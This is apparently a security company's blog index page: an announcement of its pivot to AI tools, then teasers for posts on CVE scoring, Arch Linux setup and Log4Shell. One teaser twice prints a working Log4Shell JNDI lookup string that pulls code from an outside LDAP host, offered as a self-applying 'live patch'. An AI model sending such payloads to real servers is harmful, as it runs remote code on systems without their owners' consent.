Skip to main content

· 5 min read
Free Wortley

It's been a crazy year for everybody with the advent of AI and the rise of GPT-3 + newer LLMs. Nearly the entire world has been talking about it, and we're no exception. Even as a security company, we've been playing around with how we can leverage these tools to help us extract information about CVEs and perform other security work.

We've learned a lot about the AI space because of that work, and, even though we've been working on some really cool stuff, we've also realized that Security isn't the best place for us to be as a startup. It's a tough market with long sales cycles (since only enterprises really care about security), and it's hard to compete as a small player in the space.

That's why we're pivoting and why I'm writing this post today: To announce our new name, LunaBrain, and to describe the work that we've been doing in the AI space. (You can check out our new blog here, and I'll link our GitHub below.)

Why AI?

AI is a crazy market that's changing at an unprecedented rate that, in my opinion, is as impactful to society as how the creation of both personal computers and the internet were. It's going to be important enough that, as a startup trying to build a sustainable business, it's clearly the best place for us to invest our time currently.

And while AI has historically required a PhD to do anything with, the recent advancements in LLMs have made it so that even code monkeys like us can build some really cool stuff. (And we've been doing just that!)

You can see the projects we're building on our new LunaBrain GitHub Organization, and I'll briefly list out a few of the projects we've been working on below.

Our AI Projects

LunaPipe

GitHub Repo (🌟 Stars appreciated!)

Video of Chris showing off how LunaPipe works.

We built a command line tool that you can use to pipe data into ChatGPT and have it perform tasks for you. It's a bit of a crazy idea, but it's also proven to be a very powerful tool. You can use it to generate code, filter output from Bash, or really do anything else that you can imagine fitting into a text prompt.

Example: Create a simple Golang function

$ lunapipe "Write me a go function that prints 'Hello World'"
Here's an example Go function that prints "Hello World" to the console:

```go
package main

import "fmt"

func main() {
fmt.Println("Hello World")
}

Example: Quickly identify the files in an arbitrary directory

$ ls | lunapipe "Based on the files, what language is this repo?"
This repo is written in Go (also known as Golang).

There are a ton of other ideas that we have for this tool, like using Golang templates that can be shared, and we would love if you were willing to give it a shot!

LunaBrain

GitHub Repo (💫)

Chris showing "How to build an AI company" with LunaBrain.

One of the most interesting areas in AI currently is with how it allows us to "compress" information. You can feed in a book and ask ChatGPT to "summarize it in a few paragraphs", and it'll do a pretty good job at it!

This is a really powerful concept that's something we've been exploring with our tool, LunaBrain, to help people build workflows around this concept. Want to get a summary of a blog post? Just paste in the URL and LunaBrain will scrape + summarize it for you. (And stick it into a database that you can search later!)

We're still in the early phases of development of this tool, but it's already something we're using in our daily workflows. You can play with it on our Discord server in the #bot-testing channel or you can run it locally yourself.

Our AI Blog + Stream

Finally, we've also been blogging about AI topics like "How Vector Databases Work" and also streaming on YouTube.

If there is anything that you'd like is to blog about, feel free to email me at free@lunasec.io or pop over to the Discord too. I'm always down to talk with other smart folks.

Thank you for reading and for being a part of our startup journey!

· 6 min read
Free Wortley

On March 28th, Cerebras released on HuggingFace a new Open Source model trained on The Pile dataset called "Cerebras-GPT" with GPT-3-like performance. ( Link to press release)

What makes Cerebras interesting?

While Cerebras isn't as capable of a model for performing tasks when compared directly to models like LLaMA, ChatGPT, or GPT-4, it has one important quality that sets it apart: It's been released under the Apache 2.0 licence, a fully permissive Open Source license, and the weights are available for anybody to download and try out.

This is different from other models like LLaMA that, while their weights are freely available, their license restricts LLaMAs usage to only "Non-Commercial" use cases like academic research or personal tinkering.

That means if you'd like to check out LLaMA you'll have to get access to a powerful GPU to run it or use a volunteer-run service like KoboldAI. You can't just go to a website like you can with ChatGPT and expect to start feeding it prompts. (At least without running the risk of Meta sending you a DMCA takedown request.)

Proof-of-Concept to demonstrate Cerebras Training Hardware

The real reason that this model is being released is showcase the crazy silicon that Cerebras has been spending years building.

Cerebras vs NVIDIA silicon die show

A comparison of "one" Cerebras chip compared to an NVIDIA V100 chip.

· 5 min read
Forrest Allison

OpenAI, once a beacon of hope for the open-source community, has evolved into a closed-source, profit-driven behemoth, leaving many to question its trustworthiness. Despite this transformation, LunaSec has been making great use of their products, including the recent release of ChatGPT, which has ignited a chatbot arms race among tech giants. However, due to OpenAI's departure from its original vision and the influence of multi-billion-dollar deals like Microsoft's massive investment, we hope to eventually transition to an open-source alternative.

open your wallet discord message

I can't take full credit for the title. This sentiment is all over the open source community.

· 6 min read
Chris Thompson
Yiannis Pavlosoglou
boat

Would you rather have a boat with a scratch or a boat with a hole?

Are you drowning in vulnerabilities?

Talking about vulnerabilities is too terse, let’s talk about boats. If your boat had a hole in it, you would probably patch that hole as fast as you could. You definitely wouldn’t want your boat to take on water and sink. On the other hand, if your boat had a scar on it and not a hole, you would want to assess the level of damage, perform the minimum fixes required and focus back on steering your boat.

· 8 min read
Forrest Allison

There's a shiny new web feature in browser town, and it's called CSSStyleSheets.

What is CSSStyleSheets?

CSSStyleSheets allows you to manipulate page styling without having to load CSS anywhere in the HTML of the page.

With CSSStyleSheets you can do things like:

const sheet = new CSSStyleSheet();
// Apply a rule to the sheet
sheet.replaceSync("a { color: red; }");
// disable the sheet to remove it from the DOM
sheet.disabled = true;

Neat. Support just became widespread, with adoption by Chrome, Safari, Firefox, etc added in the last year (as of early 2023).

· 2 min read
Yiannis Pavlosoglou
Free Wortley

The CISA Known Exploited Vulnerabilities Catalog

The US Cybersecurity & Infrastructure Security Agency (CISA) maintains a catalog of vulnerabilities which are known to be actively exploited in the wild.

As of January 2023, this list contains 871 vulnerabilities ranging from multiple product remote code execution vulnerabilities to vulnerabilities on frameworks such as Apache Struts, Log4Shell and similar.

· 6 min read
Forrest Allison
Alex Vanderpot
Free Wortley

Vulnerability Severity Scoring

Most Security folks are already familiar with CVSS as a framework used by NVD to try to assign a quantifiable severity score to vulnerabilities. They also know to never take CVSS scores at face value and to always view them with a grain of salt.

Why can't we trust CVSS alone? Simply put: Because CVSS doesn't include how likely a vulnerability is to be exploited in reality. It's just a formula that lives in a vacuum and lacks the context necessary to help organizations accurately assess the risk of a breach if left unpatched.

That's where an exciting new effort, called EPSS, comes in.

What is EPSS?

· 6 min read
Free Wortley
Text4Shell Logo

What is Text4Shell?

Text4Shell is a vulnerability in the Java library Apache Commons Text. This vulnerability, in specific conditions, allows an attacker to execute arbitrary code on the victim's machine (Remote Code Execution or "RCE"). The vulnerability was discovered by Alvaro Muñoz (aka pwntester) and announced publicly on October 13th

Text4Shell was officially assigned the CVE-2022-42889 identifier.

· 19 min read
Chris Thompson
Free Wortley

Security is Everything

If you're thinking about security for your company, but you don't know where to start, then you've come to right place.

Security spans the entirety of your company, all the way from how you onboard employees to the dependencies you import, but adding security comes at a cost: More secure systems are often more complicated to use.

Given that tradeoff, which areas of security should you focus on first?

We'll be answering that question today, based on our conversations with hundreds of companies, and we'll be offering our advice about how you can balance between security and usability as you grow.

· 4 min read
Alex Vanderpot

What is VEX?

As we highlighted in our post on False Positives in Vulnerability Scanning,1 output of vulnerability assessment tools like npm audit can be cumbersome because it lacks context. VEX (Vulnerability EXchange) is a new standard developed by the NTIA to exchange information about which vulnerabilities are actually exploitable in a product.

· 7 min read
Forrest Allison

False Positives Everywhere

As a web developer, I've learned to ignore vulnerability scan results and that's a big problem.

Most of the results aren't relevant. Sometimes I find it easy to figure out what's safe to ignore from the findings. Other times I find myself scouring documentation, source code, and blog posts only to discover the "RCE" npm audit told me I had doesn't matter.

· 8 min read
Gabe Martino

Arch Linux Install

BTW we use Arch

Here at LunaSec not only have we been busy hacking, but we've also onboarded a couple new team members WOOHOO 🥳! Through the onboarding process, we realized there is an opportunity to release our developer environment setup as a guide for the community.

We're sharing this guide to both show how we are using Arch Linux as Security Engineers at LunaSec and to give confidence to developers considering making the switch to Arch.

Why is Arch the best operating system for developers?

Here are a few of the reasons why we decided to use Arch as our development environment:

  • We have direct visibility and control down to the kernel
  • We know what's on our system and only use what we deem necessary
  • We can configure our environments to meet security standards quickly and seamlessly
  • We have access to the latest packages for development

We found Arch to be that sweet spot between security, accessibility, and productivity. As an Open Source startup, using Open Source software is fundamental to our values and culture as security professionals.

· 14 min read
Free Wortley
Chris Thompson
Forrest Allison

Spring4Shell Logo

Logo by Daniel Christensen

Originally posted March 30th, 2022.

Update, Patch Available: Patches are now available for Spring4Shell in Spring versions 5.3.18 and 5.2.20 and an official CVE has been published as CVE-2022-22965.

What is it?

Two serious vulnerabilities leading to remote code execution (RCE) have been found in the popular Spring framework, one in Spring Core and the other in Spring Cloud Functions.

· 9 min read
Chris Thompson
Free Wortley
Forrest Allison

node-ipc is a popular package to help with inter-process communication in Node. In protest of Russia's invasion of Ukraine, the author of the package intentionally added malware on March 16th that targets Russian and Belarusian IPs.

The code attempts to geo-locate where it's running, and if it discovers it is running with in Russia or Belarus, then it attempts to replace the contents of every file on the system with a unicode heart character: ❤. In a more recent version, it instead just drops a file with a peace message on the desktop.

· 9 min read
Chris Thompson

TL;DR - The latest vulnerabilities found in Log4j 2.17.0 are much less serious than the hype would suggest. Continue to patch your systems to at least Log4j 2.17.0 (Java 8) or 2.12.3 (Java 7).

All aboard the Log4Shell hype train Anyone on this train deserves a much-needed break.

After a DOS attack with limited impact was discovered in 2.16.0 and log4j was updated to 2.17.0 to fix it, another even less impactful vulnerability was discovered in 2.17.0. I wonder if we should say "vulnerability" in quotes because this latest vulnerability requires an attacker to have access to the logger configuration file, which is a very privileged and unlikely scenario. It's so minor, we have chosen not to scan for it in our Log4shell scanning tool. We hope the focus will remain on fixing the far more critical vulnerabilities in earlier versions.

In this post, we'll look at the motivations and repercussions of hyping up this far less serious attack vector. Then, we'll look at a timeline of the vulnerabilities discovered in log4j, ending with this latest vulnerability.

· 8 min read
Forrest Allison

From the beginning of the log4shell issue, we have been delivering actionable advice and tools which can automatically find and fix Log4Shell. We were quick to see the seriousness of the vulnerability, and helped the community to coalesce into an organized remediation effort. From experience, we know that those responding to Log4Shell are in a stressful situation.

It's easy to imagine walking into a meeting and not being able to tell your boss if data has been leaked. Even worse, to not be able to say for sure if an attack has happened or not. While many are having these uncomfortable meetings about security, there has never been a better time to lobby for more attention to security and the installation of stronger defences.

We want to make it known that there are ways to protect data against attacks like Log4Shell. For the better part of a year, we've been building an Open Source framework to make it so these vulnerabilities, even full RCEs like Log4Shell, can't leak the sensitive data that attackers are really after. It feels more relevant now than ever.

· 16 min read
Free Wortley
Chris Thompson
Forrest Allison

Log4Shell Logo

Originally Posted @ December 12th & Last Updated @ December 19th, 3:37pm PST

Also read: Our analysis of CVE-2021-45046 (a second log4j vulnerability).

A few days ago, a serious new vulnerability was identified in Apache log4j v2 and published as CVE-2021-44228. We were one of the first security companies to write about it, and we named it "Log4Shell".

This guide will help you:

  1. Find trusted sources for Log4Shell information
  2. Determine if you are impacted by Log4Shell
  3. Mitigate the Issue
info

If you're just trying to understand the Log4Shell vulnerability and the impact of it, please refer to our earlier blog post.

· 8 min read
Free Wortley
Chris Thompson
Forrest Allison

Log4Shell Logo

Originally Posted @ December 14th & Last Updated @ December 19th, 3:37pm PST

Just trying to fix this? Please read our dedicated Mitigation Guide.

After the log4j maintainers released version 2.15.0 to address the Log4Shell vulnerability, an additional attack vector was identified and reported in CVE-2021-45046.

Our research into this shows that this new CVE invalidates previous mitigations used to protect versions 2.7.0 <= Apache log4j <= 2.14.1 from Log4Shell in some cases.

Conditions for the vulnerability

You may still be vulnerable to Log4Shell (RCE), if you only enabled the formatMsgNoLookups flag or set %m{nolookups} when you also set data in the ThreadContext with attacker controlled data. In this case, you must upgrade to >= 2.15.0, or else you will still be vulnerable to RCE.

For version 2.15.0

Update There has been a limited RCE discovered in 2.15.0, and the severity has been upgraded from 3.7 -> 9.0.

We found that the DOS outlined in the CVE was not actually impactful because it did not consume resources during our testing (see below).

Our reproduction could be incomplete however, so we continue to recommend that you upgrade to 2.17.0 in the event that a better exploit is found to abuse this attack vector.

· 8 min read
Free Wortley
Chris Thompson
Forrest Allison

Originally Posted @ December 15th & Last Updated @ December 19th, 3:37pm PST

TL;DR: This string will temporarily fix your systems by patching them against Log4Shell, but please read the rest of this post before you use it! Update: We posted a follow-up post with a technical deep-dive into how this exploit works.

${jndi:ldap://patch.log4shell.com:1389/a}

If you're looking for resources on how to detect and patch yourself against Log4Shell, please also read our in-depth Mitigation Guide.

Why Log4Shell is an especially painful vulnerability

Mitigating a vulnerability in a single dependency used by your project typically requires a lot of work:

  • Code must be written.
  • Tests must pass.
  • Changes must be approved.
  • It must be deployed.
  • And, finally, it must be monitored.

Additionally, a vulnerability in a logging framework, especially one as prolific as log4j, is often not a single vulnerability in a single dependency. Mitigating Log4Shell isn't just a matter of updating your code, but also requires updating all of your dependencies that are also using log4j.

Now repeat that 50+ times for every service you own. Welcome to Log4Shell!

· 7 min read
Free Wortley
Chris Thompson
Forrest Allison

Log4Shell Logo

The logo gets worse as the situation gets worse...

Originally Posted @ December 17th & Last Updated @ December 19th, 3:37pm PST

Earlier today, the second Log4j vulnerability (CVE-2021-45046), was upgraded from a CVSS score of 3.7 (limited DOS) to a CVSS score of 9.0 (limited RCE). Note: the reported limited RCE has only been proven to be exploitable on macOS at the moment. We expect, in time, that other operating systems will also be shown to be exploitable. Update: More operating systems have been showing to be vulnerable: MacOS, Fedora, Arch Linux, and Alpine Linux.

See the bottom of this post for an example exploit payload that bypasses the checks in log4j 2.15.0.

Just trying to patch Log4Shell? Please read our dedicated Mitigation Guide.

Context on CVE Timeline

The Log4j team had previously released version 2.15.0 on December 6th to address, which at the time had only been privately disclosed, the Log4Shell vulnerability that abused JNDI and LDAP to allow for an easily exploitable RCE vulnerability. We posted a blog post about this new RCE that, at the time, was only being posted about by the Chinese InfoSec community on December 9th, 2021. This post made the broader InfoSec community aware of the ongoing exploitation and resulted in a frenzy as Java developers worked to patch themselves.

The following day, on December 10th, an official CVE was associated with this RCE vulnerability as CVE-2021-44228 with the maximum possible CVSS score of 10.0.

In the days afterwards, it was realized that this fix was incomplete as bypasses were found that could result in a limited DOS for 2.15.0 users, and, for users that had patched older Log4j releases using formatMsgNoLookups, these bypasses could be used to allow for limited RCE.

Version 2.16.0 was released on December 13th to address the vulnerabilities by completely disabling JNDI by default. The next day, on December 14th, the second vulnerability was officially given a dedicated CVE numbered CVE-2021-45046 with a limited 3.7 (now 9.0).

In this post, we're going to talk about the impact of these changes, and about why the CVSS score has changed so drastically.

· 9 min read
Forrest Allison
Free Wortley

The worldwide scramble to fix the Log4Shell vulnerability has resulted in a number of paths to resolution without a single trusted, clear, and concise recommendation. Ever since our initial report on the Log4Shell vulnerability, we have made countless updates to our posts over the past week as more information has been uncovered and new vulnerabilities are found. Ideally, the narrative would be much clearer for a library which is so widely used.

We feel that the chaos which has followed the initial report of the Log4Shell vulnerability started with how the public patching of Log4j was handled on GitHub. This is a step-by-step guide for Open Source maintainers on how to handle the security patching process properly, using the Log4Shell incident as a retrospective.

· 6 min read
Free Wortley
Chris Thompson

Log4Shell Logo

Technical Analysis: Understanding the Live Patch

The other day we published a Log4Shell payload that, when used to exploit a server, would patch the server against future exploitation from Log4Shell. You can read through our post explaining why we built it here.

It looks like this:

${jndi:ldap://patch.log4shell.com:1389/a}

In this post, we're going to dissect what's going on with this live patch to explain how it works. If you're curious to dig into this more, you can view the code on GitHub too.

· 11 min read
Free Wortley
Chris Thompson
Forrest Allison

Log4Shell Logo

Originally Posted @ December 9th & Last Updated @

Fixing Log4Shell? Claim a free vulnerability scan on our dedicated security platform and generate a detailed report in minutes.

What is it?

On Thursday, December 9th a 0-day exploit in the popular Java logging library log4j (version 2), called Log4Shell, was discovered that results in Remote Code Execution (RCE) simply by logging a certain string.

Given how ubiquitous this library is, the severity of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe.

The 0-day was tweeted along with a POC posted on GitHub. While we had initially given it the name "Log4Shell", the vulnerability has now been published as CVE-2021-44228 on NVD.

This post provides resources to help you understand the vulnerability and how to mitigate it.

· 8 min read
Forrest Allison

I'm a normal, non-security focused developer, but I work for a security company. I wasn't surprised to learn that our services use a good, well-thought-out CSP to protect our users.

What did come as a big surprise to me is that most companies, even huge, well thought of ones, have CSPs that don't protect from anything. Some have given up and don't even use them at all (like www.google.com). For the most part, it's not their fault and there's not much they can do about it. More on that below.

· 11 min read
Chris Thompson

Writing a few lines of code is pretty easy. You might have taken an Intro to CS class or taught yourself from a programming language book, and eventually you became pretty comfortable going from an idea in your head to code that actually runs.

You probably have a GitHub account with a few personal projects that you work on occasionally when you feel inspired. Looking at the code after some time, you might ask yourself "did I really write this?" It's with a fresh perspective that you notice the same code copy and pasted a few times in odd places.

For a personal project, that's probably okay. For a professional project involving a team of developers, it can quickly become a painful problem.

· 5 min read
Forrest Allison

...and why it didn't make our builds any faster

Part 2 of a series on optimizing our build system. I explain how our build system is laid out in Part 1.

Docker Buildkit

Our CI builds and runs a lot of containers, and takes around 30 minutes. In an attempt to make it faster, I did a deep dive into the experimental and semi-documented world of Docker's Buildkit.

· 8 min read
Forrest Allison

At LunaSec, our system is made up of a lot of parts. Servers we deploy, servers that our users deploy, web apps, npm modules, Go binaries, these docs... You get the picture.

Using a monorepo with Lerna for our entire project has been an absolute lifesaver, especially for local dev, but getting CI to a place we're happy with has been a months long effort.

Here are some of the main things we've figured out.

· 7 min read
Free Wortley

We are proud to announce that LunaDefend has hit Version 1.0 and has been publicly released on our GitHub page. With this release, we've officially hit stable and are now offering enterprise and open-source support for LunaDefend.

AWS, NodeJS, and React is the fully supported stack at the moment, and now we are hard at work adding support for more environments.

Please take a moment to learn about LunaDefend by reading the rest of this post and trying the example app (it's really easy).

Read on....